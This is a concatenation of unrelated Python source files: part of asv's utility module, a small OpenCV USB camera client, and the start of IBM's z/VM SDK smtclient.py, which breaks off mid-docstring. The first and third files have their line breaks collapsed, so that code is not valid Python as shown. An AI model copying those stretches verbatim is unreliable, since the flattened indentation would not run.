rlist: output = os.read(f, PIPE_BUF) fds[f].append(output) debug_log(output) if dots and time.time() - last_dot_time > 0.5: if dots is True: log.dot() elif dots: dots() last_dot_time = time.time() finally: if posix and is_main_thread(): # Restore signal handlers signal.signal(signal.SIGTSTP, signal.SIG_DFL) signal.signal(signal.SIGCONT, signal.SIG_DFL) if proc.returncode is None: # Timeout or another exceptional condition occurred, and # the program is still running. 
if posix: # Terminate the whole process group _killpg_safe(proc.pid, signal.SIGTERM) for j in range(10): time.sleep(0.1) if proc.poll() is not None: break else: # Didn't terminate within 1 sec, so kill it _killpg_safe(proc.pid, signal.SIGKILL) else: proc.terminate() proc.wait() proc.stdout.flush() if not redirect_stderr: proc.stderr.flush() stdout_chunks.append(proc.stdout.read()) if not redirect_stderr: stderr_chunks.append(proc.stderr.read()) proc.stdout.close() if not redirect_stderr: proc.stderr.close() # Flush and disconnect debug log, if any debug_log(None) def debug_log(c): return None stdout = b''.join(stdout_chunks) stderr = b''.join(stderr_chunks) stdout = stdout.decode('utf-8', 'replace') stderr = stderr.decode('utf-8', 'replace') if is_timeout: retcode = TIMEOUT_RETCODE else: retcode = proc.returncode if valid_return_codes is not None and retcode not in valid_return_codes: header = 'Error running {0} (exit status {1})'.format(' '.join(args), retcode) if display_error: if log.is_debug_enabled(): # Output was already printed log.error(header) else: log.error(get_content(header)) raise ProcessError(args, retcode, stdout, stderr) if return_stderr: return (stdout, stderr, retcode) else: return stdout def _killpg_safe(pgid, signo): """ Same as os.killpg, but deal with OSX/BSD """ try: os.killpg(pgid, signo) except OSError as exc: if exc.errno == errno.EPERM: # OSX/BSD may raise EPERM on killpg if the process group # already terminated pass else: raise def is_main_thread(): """ Return True if the current thread is the main thread. """ return threading.current_thread() == threading.main_thread() def write_json(path, data, api_version=None, compact=False): """ Writes JSON to the given path, including indentation and sorting. Parameters ---------- path : str File name to write data : object Data to serialize as JSON api_version : int, optional API version number compact : bool, optional Whether to produce compact, non-human readable JSON. Disables sorting and indentation. """ path = os.path.abspath(path) dirname = long_path(os.path.dirname(path)) if not os.path.exists(dirname): os.makedirs(dirname) if api_version is not None: data = dict(data) data['version'] = api_version open_kwargs = {} open_kwargs['encoding'] = 'utf-8' with long_path_open(path, 'w', **open_kwargs) as fd: if not compact: json.dump(data, fd, indent=4, sort_keys=True) else: json.dump(data, fd) def load_json(path, api_version=None, js_comments=False): """ Loads JSON from the given path. Parameters ---------- path : str File name api_version : str or None API version indentifier js_comments : bool, optional Whether to allow nonstandard javascript-style comments in the file. Note that this slows down the loading significantly. """ # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', UserError) path = os.path.abspath(path) open_kwargs = {} open_kwargs['encoding'] = 'utf-8' with long_path_open(path, 'r', **open_kwargs) as fd: content = fd.read() if js_comments: content = minify_json.json_minify(content) content = content.replace(",]", "]") content = content.replace(",}", "}") try: d = json.loads(content) except ValueError as e: raise UserError( "Error parsing JSON in file '{0}': {1}".format( path, str(e))) if api_version is not None: if 'version' in d: if d['version'] < api_version: raise UserError( "{0} is stored in an old file format. 
Run " "`asv update` to update it.".format(path)) elif d['version'] > api_version: raise UserError( "{0} is stored in a format that is newer than " "what this version of asv understands. Update " "asv to use this file.".format(path)) del d['version'] else: raise UserError( "No version specified in {0}.".format(path)) return d def update_json(cls, path, api_version, compact=False): """ Perform JSON file format updates. Parameters ---------- cls : object Object containing methods update_to_X which updates the given JSON tree from version X-1 to X. path : str Path to JSON file api_version : int The current API version """ # Hide traceback from expected exceptions in pytest reports __tracebackhide__ = operator.methodcaller('errisinstance', UserError) d = load_json(path) if 'version' not in d: raise UserError( "No version specified in {0}.".format(path)) if d['version'] < api_version: for x in range(d['version'] + 1, api_version + 1): d = getattr(cls, 'update_to_{0}'.format(x), lambda x: x)(d) write_json(path, d, api_version, compact=compact) elif d['version'] > api_version: raise UserError( "{0} is stored in a format that is newer than " "what this version of asv understands. " "Upgrade asv in order to use or add to " "these results.".format(path)) def iter_chunks(s, n): """ Iterator that returns elements from s in chunks of size n. """ chunk = [] for x in s: chunk.append(x) if len(chunk) == n: yield chunk chunk = [] if len(chunk): yield chunk def pick_n(items, n): """Pick n items, attempting to get equal index spacing. """ if not (n > 0): raise ValueError("Invalid number of items to pick") spacing = max(float(len(items)) / n, 1) spaced = [] i = 0 while int(i) < len(items) and len(spaced) < n: spaced.append(items[int(i)]) i += spacing return spaced def get_multiprocessing(parallel): """ If parallel indicates that we want to do multiprocessing, imports the multiprocessing module and sets the parallel value accordingly. """ if parallel != 1: import multiprocessing if parallel <= 0: parallel = multiprocessing.cpu_count() return parallel, multiprocessing return parallel, None def iter_subclasses(cls): """ Returns all subclasses of a class. """ for x in cls.__subclasses__(): yield x for y in iter_subclasses(x): yield y def hash_equal(a, b): """ Returns `True` if a and b represent the same commit hash. """ min_len = min(len(a), len(b)) return a.lower()[:min_len] == b.lower()[:min_len] def get_cpu_info(): """ Gets a human-friendly description of this machine's CPU. Returns '' if it can't be obtained. """ if sys.platform.startswith('linux'): with open("/proc/cpuinfo", "rb") as fd: lines = fd.readlines() for line in lines: if b':' in line: key, val = line.split(b':', 1) key = key.strip() val = val.strip() if key == b'model name': return val.decode('ascii') elif sys.platform.startswith('darwin'): sysctl = which('sysctl') return check_output([sysctl, '-n', 'machdep.cpu.brand_string']).strip() elif sys.platform.startswith('win'): try: from win32com.client import GetObject cimv = GetObject(r"winmgmts:root\cimv2") return cimv.ExecQuery("Select Name from Win32_Processor")[0].name except Exception: pass return '' def get_memsize(): """ Returns the amount of physical memory in this machine. Returns '' if it can't be obtained. 
""" if sys.platform.startswith('linux'): with open("/proc/meminfo", "rb") as fd: lines = fd.readlines() for line in lines: if b':' in line: key, val = line.split(b':', 1) key = key.strip() val = val.strip() if key == b'MemTotal': return int(val.split()[0]) elif sys.platform.startswith('darwin'): sysctl = which('sysctl') return int(check_output([sysctl, '-n', 'hw.memsize']).strip()) return '' def format_text_table(rows, num_headers=0, top_header_span_start=0, top_header_text=None): """ Format rows in as a reStructuredText table, in the vein of:: ========== ========== ========== -- top header text, span start 1 ---------- --------------------- row0col0 r0c1 r0c2 ========== ========== ========== row1col0 r1c1 r1c2 row2col0 r2c1 r2c2 ========== ========== ========== """ # Format content text_rows = [["{0}".format(item).replace("\n", " ") for item in row] for row in rows] # Ensure same number of items on all rows num_items = max(len(row) for row in text_rows) for row in text_rows: row.extend([''] * (num_items - len(row))) # Determine widths col_widths = [max(len(row[j]) for row in text_rows) + 2 for j in range(num_items)] # Pad content text_rows = [[item.center(w) for w, item in zip(col_widths, row)] for row in text_rows] # Generate result headers = [" ".join(row) for row in text_rows[:num_headers]] content = [" ".join(row) for row in text_rows[num_headers:]] separator = " ".join("-" * w for w in col_widths) result = [] if top_header_text is not None: left_span = "-".join("-" * w for w in col_widths[:top_header_span_start]) right_span = "-".join("-" * w for w in col_widths[top_header_span_start:]) if left_span and right_span: result += ["--" + " " * (len(left_span) - 1) + top_header_text.center(len(right_span))] result += [" ".join([left_span, right_span])] else: result += [top_header_text.center(len(separator))] result += ["-".join([left_span, right_span])] result += headers result += [separator.replace("-", "=")] elif headers: result += headers result += [separator] result += content result = [separator.replace("-", "=")] + result result += [separator.replace("-", "=")] return "\n".join(result) def _datetime_to_timestamp(dt, divisor): delta = dt - datetime.datetime(1970, 1, 1) microseconds = (delta.days * 86400 + delta.seconds) * 10**6 + delta.microseconds value, remainder = divmod(microseconds, divisor) if remainder >= divisor // 2: value += 1 return value def datetime_to_timestamp(dt): """ Convert a Python datetime object to a UNIX timestamp. """ return _datetime_to_timestamp(dt, 10**6) def datetime_to_js_timestamp(dt): """ Convert a Python datetime object to a JavaScript timestamp. """ return _datetime_to_timestamp(dt, 10**3) def js_timestamp_to_datetime(ts): """ Convert a JavaScript timestamp to a Python datetime object. """ return datetime.datetime.fromtimestamp(ts / 1000) def is_nan(x): """ Returns `True` if x is a NaN value. """ if isinstance(x, float): return x != x return False def is_na(value): """ Return True if value is None or NaN """ return value is None or is_nan(value) def mean_na(values): """ Take a mean, with the understanding that None and NaN stand for missing data. """ values = [x for x in values if not is_na(x)] if values: return sum(values) / len(values) else: return None def geom_mean_na(values): """ Compute geometric mean, with the understanding that None and NaN stand for missing data. 
""" values = [x for x in values if not is_na(x)] if values: exponent = 1 / len(values) prod = 1.0 acc = 0 for x in values: prod *= abs(x)**exponent acc += x return prod if acc >= 0 else -prod else: return None def ceildiv(numerator, denominator): """Ceiling division""" return -((-numerator) // denominator) if not WIN: long_path_open = open long_path_rmtree = shutil.rmtree def long_path(path): return path else: def long_path(path): if path.startswith("\\\\"): return path return "\\\\?\\" + os.path.abspath(path) def _remove_readonly(func, path, exc_info): """Try harder to remove files on Windows""" if isinstance(exc_info[1], OSError) and exc_info[1].errno == errno.EACCES: # Clear read-only flag and try again try: os.chmod(path, stat.S_IWRITE | stat.S_IREAD) func(path) return except OSError: pass # Reraise original error raise def long_path_open(filename, *a, **kw): return open(long_path(filename), *a, **kw) def long_path_rmtree(path, ignore_errors=False): if ignore_errors: onerror = None else: onerror = _remove_readonly shutil.rmtree(long_path(path), ignore_errors=ignore_errors, onerror=onerror) def sanitize_filename(filename): """ Replace characters to make a string safe to use in file names. This is not a 1-to-1 mapping. The implementation needs to match www/asv.js:escape_graph_parameter """ if not isinstance(filename, str): filename = filename.decode(sys.getfilesystemencoding()) # ntfs & ext3 filename = re.sub('[<>:"/\\^|?*\x00-\x1f]', '_', filename) # ntfs forbidden = ["CON", "PRN", "AUX", "NUL", "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9", "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9"] if filename.upper() in forbidden: filename = filename + "_" return filename def namedtuple_with_doc(name, slots, doc): cls = collections.namedtuple(name, slots) cls.__doc__ = doc return cls def recvall(sock, size): """ Receive data of given size from a socket connection """ data = b"" while len(data) < size: s = sock.recv(size - len(data)) data += s if not s: raise RuntimeError("did not receive data from socket " "(size {}, got only {!r})".format(size, data)) return data def interpolate_command(command, variables): """ Parse a command with interpolated variables to a sequence of commands. The command is parsed as in posix-style shell (by shlex) and split to parts. Additional constructs recognized: - ``ENVVAR=value <command>``: parsed as declaring an environment variable named 'ENVVAR'. - ``return-code=value <command>``: parsed as declaring valid return codes. - ``in-dir=value <command>``: parsed as declaring working directory for command. Parameters ---------- command : str Command to execute, posix shell style. variables : dict Interpolation variables. Returns ------- command : list of str Command arguments. env : dict Environment variables declared in the command. return_codes : {set, int, None} Valid return codes. cwd : {str, None} Current working directory for the command, if any. 
""" parts = shlex.split(command) try: result = [c.format(**variables) for c in parts] except KeyError as exc: raise UserError("Configuration error: {{{0}}} not available " "when substituting into command {1!r} " "Available: {2!r}" "".format(exc.args[0], command, variables)) env = {} return_codes_set = False return_codes = {0} cwd = None while result: m = re.match('^([A-Za-z_][A-Za-z0-9_]*)=(.*)$', result[0]) if m: env[m.group(1)] = m.group(2) del result[0] continue if result[0].startswith('return-code='): if return_codes_set: raise UserError("Configuration error: multiple return-code specifications " "in command {0!r} " "".format(command)) break if result[0] == 'return-code=any': return_codes = None return_codes_set = True del result[0] continue m = re.match('^return-code=([0-9,]+)$', result[0]) if m: try: return_codes = set(int(x) for x in m.group(1).split(",")) return_codes_set = True del result[0] continue except ValueError: pass raise UserError("Configuration error: invalid return-code specification " "{0!r} when substituting into command {1!r} " "".format(result[0], command)) if result[0].startswith('in-dir='): if cwd is not None: raise UserError("Configuration error: multiple in-dir specifications " "in command {0!r} " "".format(command)) break cwd = result[0][7:] del result[0] continue break return result, env, return_codes, cwd def truncate_float_list(item, digits=5): """ Truncate floating-point numbers (in a possibly nested list) to given significant digits, for a shorter base-10 representation. """ if isinstance(item, float): fmt = '{{:.{}e}}'.format(digits - 1) return float(fmt.format(item)) elif isinstance(item, list): return [truncate_float_list(x, digits) for x in item] else: return item _global_locks = {} def _init_global_locks(lock_dict): """Initialize global locks in a new multiprocessing process""" _global_locks.update(lock_dict) def new_multiprocessing_lock(name): """Create a new global multiprocessing lock""" _global_locks[name] = multiprocessing.Lock() def get_multiprocessing_lock(name): """Get an existing global multiprocessing lock""" return _global_locks[name] def get_multiprocessing_pool(parallel=None): """Create a multiprocessing.Pool, managing global locks properly""" return multiprocessing.Pool(initializer=_init_global_locks, initargs=(_global_locks,)) try: from shlex import quote as shlex_quote except ImportError: _find_unsafe = re.compile(r'[^\w@%+=:,./-]').search def shlex_quote(s): """Return a shell-escaped version of the string *s*.""" if not s: return "''" if _find_unsafe(s) is None: return s # use single quotes, and put single quotes into double quotes # the string $'b is then quoted as '$'"'"'b' return "'" + s.replace("'", "'\"'\"'") + "'"
usb_camera_client.py
# coding: utf-8
import Queue
import time
import threading

import cv2

QUEUE_SIZE = 10
TIME_INTERVAL_TAKE_PHOTO = 0.03  # camera is 30 FPS


class CameraClient():

    def __init__(self, camNo=0):
        cap = cv2.VideoCapture(camNo)
        cap.set(cv2.CAP_PROP_FRAME_WIDTH, 1920)
        cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 1080)
        self.cap = cap
        self.photoQueue = Queue.Queue(maxsize=QUEUE_SIZE)
        self.th = threading.Thread(target=self._takePhotoWorker)
        self.th.setDaemon(True)
        self.th.start()

    def _takePhotoWorker(self):
        while True:
            ret, frame = self.cap.read()
            if ret:
                if self.photoQueue.full():
                    self.photoQueue.get()
                self.photoQueue.put(frame)
            time.sleep(TIME_INTERVAL_TAKE_PHOTO)

    def getPhoto(self):
        return self.photoQueue.get()
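
A short usage sketch for CameraClient above. It targets Python 2 (matching the `import Queue` in the file); the module name, camera index, and output filename are illustrative assumptions.

# Hypothetical usage of CameraClient; the import path and output path
# are assumptions for illustration.
import cv2
from usb_camera_client import CameraClient

client = CameraClient(camNo=0)
frame = client.getPhoto()           # blocks until the capture thread has queued a frame
cv2.imwrite('snapshot.jpg', frame)  # persist the most recent frame to disk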
smtclient.py
# Copyright 2017,2020 IBM Corp. # # Licensed under the Apache License, Version 2.0 (the "License"); you may # not use this file except in compliance with the License. You may obtain # a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, WITHOUT # WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the # License for the specific language governing permissions and limitations # under the License. import functools import hashlib # On SLES12, we found that if you import urllib.parse later # than requests, you will find a error like 'not able to load # urllib.parse, this is because urllib will be in sys.modules # when first import requests # as workaround here, we first import urllib then import requests # later, we need consider to use urllib.request to replace # requests if that's possible to avoid this kind of issue from io import IOBase import shutil import six.moves.urllib.parse as urlparse import requests import threading import os import re import six import string import tempfile from smtLayer import smt from zvmsdk import config from zvmsdk import constants as const from zvmsdk import database from zvmsdk import exception from zvmsdk import log from zvmsdk import returncode from zvmsdk import utils as zvmutils CONF = config.CONF LOG = log.LOG _LOCK = threading.Lock() CHUNKSIZE = 4096 _SMT_CLIENT = None def get_smtclient(): global _SMT_CLIENT if _SMT_CLIENT is None: try: _SMT_CLIENT = zvmutils.import_object( 'zvmsdk.smtclient.SMTClient') except ImportError: LOG.error("Unable to get smtclient") raise ImportError return _SMT_CLIENT class SMTClient(object): def __init__(self): self._smt = smt.SMT() self._pathutils = zvmutils.PathUtils() self._NetDbOperator = database.NetworkDbOperator() self._GuestDbOperator = database.GuestDbOperator() self._ImageDbOperator = database.ImageDbOperator() def _request(self, requestData): try: results = self._smt.request(requestData) except Exception as err: LOG.error('SMT internal parse encounter error') raise exception.SDKInternalError(msg=err, modID='smt') def _is_smt_internal_error(results): internal_error_list = returncode.SMT_INTERNAL_ERROR for error in internal_error_list: if results['overallRC'] != error[0]: # overallRC does not match, continue next continue if error[1] is not None and results['rc'] != error[1]: # rc match failed continue if error[2] is not None and results['rs'] not in error[2]: # rs match failed continue # All match finish successfully, return true return True return False if results['overallRC'] != 0: results.pop('logEntries') # Check whether this smt error belongs to internal error, if so, # raise internal error, otherwise raise clientrequestfailed error if _is_smt_internal_error(results): msg = "SMT internal error. Results: %s" % str(results) LOG.error(msg) raise exception.SDKInternalError(msg=msg, modID='smt', results=results) else: msg = ("SMT request failed. 
RequestData: '%s', Results: '%s'" % (requestData, str(results))) raise exception.SDKSMTRequestFailed(results, msg) return results def get_guest_temp_path(self, userid): return self._pathutils.get_guest_temp_path(userid) def get_guest_path(self, userid): return self._pathutils.get_guest_path(userid) def clean_temp_folder(self, tmp_folder): return self._pathutils.clean_temp_folder(tmp_folder) def _generate_vdev(self, base, offset): """Generate virtual device number based on base vdev :param base: base virtual device number, string of 4 bit hex. :param offset: offset to base, integer. """ vdev = hex(int(base, 16) + offset)[2:] return vdev.rjust(4, '0') def _generate_increasing_nic_id(self, nic_id): """Generate increasing nic id string :param nic_id: hexadecimal nic id like '1000' :return: increasing nic id, string like '0.0.1000,0.0.1001,0.0.1002' """ nic_id = str(hex(int(nic_id, 16)))[2:] nic_id_1 = str(hex(int(nic_id, 16) + 1))[2:] nic_id_2 = str(hex(int(nic_id, 16) + 2))[2:] if len(nic_id_2) > 4: errmsg = ("Virtual device number %s is not valid" % nic_id_2) raise exception.SDKInvalidInputFormat(msg=errmsg) return "0.0.%s,0.0.%s,0.0.%s" % (nic_id, nic_id_1, nic_id_2) def generate_disk_vdev(self, start_vdev=None, offset=0): """Generate virtual device number for disks :param offset: offset of user_root_vdev. :return: virtual device number, string of 4 bit hex. """ if not start_vdev: start_vdev = CONF.zvm.user_root_vdev vdev = self._generate_vdev(start_vdev, offset) if offset >= 0 and offset < 254: return vdev else: msg = ("Failed to generate disk vdev, invalid virtual device" "number for disk:%s" % vdev) LOG.error(msg) raise exception.SDKGuestOperationError(rs=2, msg=msg) def add_mdisks(self, userid, disk_list, start_vdev=None): """Add disks for the userid :disks: A list dictionary to describe disk info, for example: disk: [{'size': '1g', 'format': 'ext3', 'disk_pool': 'ECKD:eckdpool1'}] """ for idx, disk in enumerate(disk_list): if 'vdev' in disk: # this means user want to create their own device number vdev = disk['vdev'] else: vdev = self.generate_disk_vdev(start_vdev=start_vdev, offset=idx) self._add_mdisk(userid, disk, vdev) disk['vdev'] = vdev if disk.get('disk_pool') is None: disk['disk_pool'] = CONF.zvm.disk_pool sizeUpper = disk.get('size').strip().upper() sizeUnit = sizeUpper[-1] if sizeUnit != 'G' and sizeUnit != 'M': sizeValue = sizeUpper disk_pool = disk.get('disk_pool') [diskpool_type, diskpool_name] = disk_pool.split(':') if (diskpool_type.upper() == 'ECKD'): # Convert the cylinders to bytes convert = 737280 else: # Convert the blocks to bytes convert = 512 byteSize = float(float(int(sizeValue) * convert / 1024) / 1024) unit = "M" if (byteSize > 1024): byteSize = float(byteSize / 1024) unit = "G" byteSize = "%.1f" % byteSize disk['size'] = byteSize + unit return disk_list def remove_mdisks(self, userid, vdev_list): for vdev in vdev_list: self._remove_mdisk(userid, vdev) def dedicate_device(self, userid, vaddr, raddr, mode): """dedicate device :userid: The name of the image obtaining a dedicated device :vaddr: The virtual device number of the device :raddr: A real device number to be dedicated or attached to the specified image :mode: Specify a 1 if the virtual device is to be in read-only mode. Otherwise, specify a 0. 
""" # dedicate device to directory entry self._dedicate_device(userid, vaddr, raddr, mode) def _dedicate_device(self, userid, vaddr, raddr, mode): """dedicate device.""" action = 'dedicate' rd = ('changevm %(uid)s %(act)s %(va)s %(ra)s %(mod)i' % {'uid': userid, 'act': action, 'va': vaddr, 'ra': raddr, 'mod': mode}) action = "dedicate device to userid '%s'" % userid with zvmutils.log_and_reraise_smt_request_failed(action): self._request(rd) def get_fcp_info_by_status(self, userid, status): """get fcp information by the status. :userid: The name of the image to query fcp info :status: The status of target fcps. eg:'active', 'free' or 'offline'. """ results = self._get_fcp_info_by_status(userid, status) return results def _get_fcp_info_by_status(self, userid, status): action = 'fcpinfo' rd = ' '.join(['getvm', userid, action, status]) action = "query fcp info of '%s'" % userid with zvmutils.log_and_reraise_smt_request_failed(action): results = self._request(rd) return results['response'] def undedicate_device(self, userid, vaddr): """undedicate device :userid: The name of the image obtaining a dedicated device :vaddr: The virtual device number of the device """ # undedicate device to directory entry self._undedicate_device(userid, vaddr) def _undedicate_device(self, userid, vaddr): """undedicate device.""" action = 'undedicate' rd = ('changevm %(uid)s %(act)s %(va)s' % {'uid': userid, 'act': action, 'va': vaddr}) action = "undedicate device from userid '%s'" % userid with zvmutils.log_and_reraise_smt_request_failed(action): self._request(rd) def get_image_performance_info(self, userid): """Get CPU and memory usage information. :userid: the zvm userid to be queried """ pi_dict = self.image_performance_query([userid]) return pi_dict.get(userid, None) def _parse_vswitch_inspect_data(self, rd_list): """ Parse the Virtual_Network_Vswitch_Query_Byte_Stats data to get inspect data. 
""" def _parse_value(data_list, idx, keyword, offset): return idx + offset, data_list[idx].rpartition(keyword)[2].strip() vsw_dict = {} with zvmutils.expect_invalid_resp_data(): # vswitch count idx = 0 idx, vsw_count = _parse_value(rd_list, idx, 'vswitch count:', 2) vsw_dict['vswitch_count'] = int(vsw_count) # deal with each vswitch data vsw_dict['vswitches'] = [] for i in range(vsw_dict['vswitch_count']): vsw_data = {} # skip vswitch number idx += 1 # vswitch name idx, vsw_name = _parse_value(rd_list, idx, 'vswitch name:', 1) vsw_data['vswitch_name'] = vsw_name # uplink count idx, up_count = _parse_value(rd_list, idx, 'uplink count:', 1) # skip uplink data idx += int(up_count) * 9 # skip bridge data idx += 8 # nic count vsw_data['nics'] = [] idx, nic_count = _parse_value(rd_list, idx, 'nic count:', 1) nic_count = int(nic_count) for j in range(nic_count): nic_data = {} idx, nic_id = _parse_value(rd_list, idx, 'nic_id:', 1) userid, toss, vdev = nic_id.partition(' ') nic_data['userid'] = userid nic_data['vdev'] = vdev idx, nic_data['nic_fr_rx'] = _parse_value(rd_list, idx, 'nic_fr_rx:', 1 ) idx, nic_data['nic_fr_rx_dsc'] = _parse_value(rd_list, idx, 'nic_fr_rx_dsc:', 1 ) idx, nic_data['nic_fr_rx_err'] = _parse_value(rd_list, idx, 'nic_fr_rx_err:', 1 ) idx, nic_data['nic_fr_tx'] = _parse_value(rd_list, idx, 'nic_fr_tx:', 1 ) idx, nic_data['nic_fr_tx_dsc'] = _parse_value(rd_list, idx, 'nic_fr_tx_dsc:', 1 ) idx, nic_data['nic_fr_tx_err'] = _parse_value(rd_list, idx, 'nic_fr_tx_err:', 1 ) idx, nic_data['nic_rx'] = _parse_value(rd_list, idx, 'nic_rx:', 1 ) idx, nic_data['nic_tx'] = _parse_value(rd_list, idx, 'nic_tx:', 1 ) vsw_data['nics'].append(nic_data) # vlan count idx, vlan_count = _parse_value(rd_list, idx, 'vlan count:', 1) # skip vlan data idx += int(vlan_count) * 3 # skip the blank line idx += 1 vsw_dict['vswitches'].append(vsw_data) return vsw_dict def _is_vdev_valid(self, vdev, vdev_info): for used_vdev in vdev_info: if (((int(vdev, 16) >= int(used_vdev, 16)) and (int(vdev, 16) <= int(used_vdev, 16) + 2)) or ((int(vdev, 16) < int(used_vdev, 16)) and (int(vdev, 16) >= int(used_vdev, 16) - 2))): return False return True def get_power_state(self, userid): """Get power status of a z/VM instance.""" LOG.debug('Querying power stat of %s' % userid) requestData = "PowerVM " + userid + " status" action = "query power state of '%s'" % userid with zvmutils.log_and_reraise_smt_request_failed(action): results = self._request(requestData) with zvmutils.expect_invalid_resp_data(results): status = results['response'][0].partition(': ')[2] return status def _check_power_state(self, userid, action): # Get the vm status power_state = self.get_power_state(userid) # Power on the vm if it is inactive if power_state == 'off': msg = ('The vm %s is powered off, please start up it ' 'before %s' % (userid, action)) raise exception.SDKGuestOperationError(rs=5, userid=userid, msg=msg) def guest_start(self, userid): """Power on VM.""" requestData = "PowerVM " + userid + " on" with zvmutils.log_and_reraise_smt_request_failed(): self._request(requestData) def guest_stop(self, userid, **kwargs): """Power off VM.""" requestData = "PowerVM " + userid + " off" if 'timeout' in kwargs.keys() and kwargs['timeout']: requestData += ' --maxwait ' + str(kwargs['timeout']) if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']: requestData += ' --poll ' + str(kwargs['poll_interval']) with zvmutils.log_and_reraise_smt_request_failed(): self._request(requestData) def guest_softstop(self, userid, **kwargs): """Power off VM 
gracefully, it will call shutdown os then deactivate vm""" requestData = "PowerVM " + userid + " softoff --wait" if 'timeout' in kwargs.keys() and kwargs['timeout']: requestData += ' --maxwait ' + str(kwargs['timeout']) else: requestData += ' --maxwait ' + str(CONF.guest.softstop_timeout) if 'poll_interval' in kwargs.keys() and kwargs['poll_interval']: requestData += ' --poll ' + str(kwargs['poll_interval']) else: requestData += ' --poll ' + str(CONF.guest.softstop_interval) with zvmutils.log_and_reraise_smt_request_failed(): self._request(requestData) def guest_pause(self, userid): self._check_power_state(userid, 'pause') requestData = "PowerVM " + userid + " pause" with zvmutils.log_and_reraise_smt_request_failed(): self._request(requestData) def guest_unpause(self, userid): self._check_power_state(userid, 'unpause') requestData = "PowerVM " + userid + " unpause" with zvmutils.log_and_reraise_smt_request_failed(): self._request(requestData) def guest_reboot(self, userid): requestData = ' '.join(("PowerVM", userid, "reboot")) with zvmutils.log_and_reraise_smt_request_failed(): self._request(requestData) def guest_reset(self, userid): requestData = ' '.join(("PowerVM", userid, "reset")) with zvmutils.log_and_reraise_smt_request_failed(): self._request(requestData) def live_migrate_move(self, userid, destination, parms): """ moves the specified virtual machine, while it continues to run, to the specified system within the SSI cluster. """ rd = ('migratevm %(uid)s move --destination %(dest)s ' % {'uid': userid, 'dest': destination}) if 'maxtotal' in parms: rd += ('--maxtotal ' + str(parms['maxTotal'])) if 'maxquiesce' in parms: rd += ('--maxquiesce ' + str(parms['maxquiesce'])) if 'immediate' in parms: rd += " --immediate" if 'forcearch' in parms: rd += " --forcearch" if 'forcedomain' in parms: rd += " --forcedomain" if 'forcestorage' in parms: rd += " --forcestorage" action = "move userid '%s' to SSI '%s'" % (userid, destination) try: self._request(rd) except exception.SDKSMTRequestFailed as err: msg = '' if action is not None: msg = "Failed to %s. " % action msg += "SMT error: %s" % err.format_message() LOG.error(msg) raise exception.SDKSMTRequestFailed(err.results, msg) def live_migrate_test(self, userid, destination): """ tests the specified virtual machine and reports whether or not it is eligible to be relocated to the specified system. """ rd = ('migratevm %(uid)s test --destination %(dest)s ' % {'uid': userid, 'dest': destination}) action = "test to move userid '%s' to SSI '%s'" % (userid, destination) try: self._request(rd) except exception.SDKSMTRequestFailed as err: msg = '' if action is not None: msg = "Failed to %s. " % action msg += "SMT error: %s" % err.format_message() LOG.error(msg) raise exception.SDKSMTRequestFailed(err.results, msg) def _get_ipl_param(self, ipl_from): if len(ipl_from) > 0: ipl_param = ipl_from else: ipl_param = CONF.zvm.user_root_vdev return ipl_param def create_vm(self, userid, cpu, memory, disk_list, profile, max_cpu, max_mem, ipl_from, ipl_param, ipl_loadparam, dedicate_vdevs, loaddev): """ Create VM and add disks if specified. 
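
        As a rough sketch only (userid, profile and sizes below are
        placeholders, and the exact text also depends on configuration and
        the optional arguments), the generated directory request looks like:

            makevm GUEST1 directory LBYONLY 2048m <privilege> --cpus 2
                --profile osdflt --maxCPU 4 --maxMemSize 4G --setReservedMem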
""" rd = ('makevm %(uid)s directory LBYONLY %(mem)im %(pri)s ' '--cpus %(cpu)i --profile %(prof)s --maxCPU %(max_cpu)i ' '--maxMemSize %(max_mem)s --setReservedMem' % {'uid': userid, 'mem': memory, 'pri': const.ZVM_USER_DEFAULT_PRIVILEGE, 'cpu': cpu, 'prof': profile, 'max_cpu': max_cpu, 'max_mem': max_mem}) if CONF.zvm.default_admin_userid: rd += (' --logonby "%s"' % CONF.zvm.default_admin_userid) # when use dasd as root disk, the disk_list[0] would be the boot # disk. # when boot from volume, ipl_from should be specified explicitly. if (disk_list and 'is_boot_disk' in disk_list[0] and disk_list[0]['is_boot_disk']) or ipl_from: # we assume at least one disk exist, which means, is_boot_disk # is true for exactly one disk. rd += (' --ipl %s' % self._get_ipl_param(ipl_from)) # load param for ipl if ipl_param: rd += ' --iplParam %s' % ipl_param if ipl_loadparam: rd += ' --iplLoadparam %s' % ipl_loadparam if dedicate_vdevs: rd += ' --dedicate "%s"' % " ".join(dedicate_vdevs) if loaddev: if 'portname' in loaddev: rd += ' --loadportname %s' % loaddev['portname'] if 'lun' in loaddev: rd += ' --loadlun %s' % loaddev['lun'] action = "create userid '%s'" % userid try: self._request(rd) except exception.SDKSMTRequestFailed as err: if ((err.results['rc'] == 436) and (err.results['rs'] == 4)): result = "Profile '%s'" % profile raise exception.SDKObjectNotExistError(obj_desc=result, modID='guest') else: msg = '' if action is not None: msg = "Failed to %s. " % action msg += "SMT error: %s" % err.format_message() LOG.error(msg) raise exception.SDKSMTRequestFailed(err.results, msg) # Add the guest to db immediately after user created action = "add guest '%s' to database" % userid with zvmutils.log_and_reraise_sdkbase_error(action): self._GuestDbOperator.add_guest(userid) # Continue to add disk if disk_list: # Add disks for vm return self.add_mdisks(userid, disk_list) def _add_mdisk(self, userid, disk, vdev): """Create one disk for userid NOTE: No read, write and multi password specified, and access mode default as 'MR'. 
